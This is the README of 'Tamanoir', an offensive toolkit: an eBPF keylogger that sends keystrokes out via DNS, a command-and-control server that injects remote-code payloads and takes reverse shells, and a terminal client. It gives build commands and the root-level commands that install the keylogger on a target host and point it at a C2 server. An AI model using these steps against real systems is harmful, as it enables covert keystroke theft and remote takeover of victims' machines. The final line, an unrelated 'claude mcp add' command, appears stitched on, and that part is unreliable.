A large anteater of Central and South America, Myrmecophaga tridactyla
Tamanoir is structured around 3 components:
An eBPF program running on a target host, it will act as a keylogger and extract keystrokes via DNS queries.
In DNS response, attacker can choose to send chunks of RCE payload that will be executed on targeted host.
The Command & Control server. It acts as a DNS proxy and can inject rce payloads in DNS response.
It also can handle reverse shell connections.
The TUI client communicating with C2 server. Built on top of ratatui
Tui client demo
Jump to: - Focus on Tamanoir (eBPF) - Focus on Tamanoir-C2 - Focus on Tamanoir-Tui
You need a Linux based OS.
To build from source, make sure you have:
nightly toolchain.cd tamanoir-ebpf && cargo build --release
cargo build -p tamanoir --release
cargo build -p tamanoir-c2 --release
cargo build -p tamanoir-tui --release
These commands will produce tamanoir, tamanoir-c2 and tamanoir-tui executables in target/release that you can add to your$PATH
You can download the pre-built binaries from the release page
🖥️ on target host:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip <C2 server IP> \
--hijack-ip <locally configured DNS server IP> \
--iface <network interface name>
for example:
RUST_LOG=info sudo -E tamanoir \
--proxy-ip 192.168.1.15 \
--hijack-ip 8.8.8.8 \
--iface wlan0
🖥️ on your C2 server host:
sudo tamanoir-c2 start
[!NOTE] Make sure port 53 is available
🖥️ wherever you want to use the client:
tamanoir-tui -i <C2 server IP>
[!NOTE] Make sure C2 server is reachable on port 50051
Tamanoir is developed for educational purposes only
GPLv3
$ claude mcp add tamanoir \
-- python -m otcore.mcp_server <graph>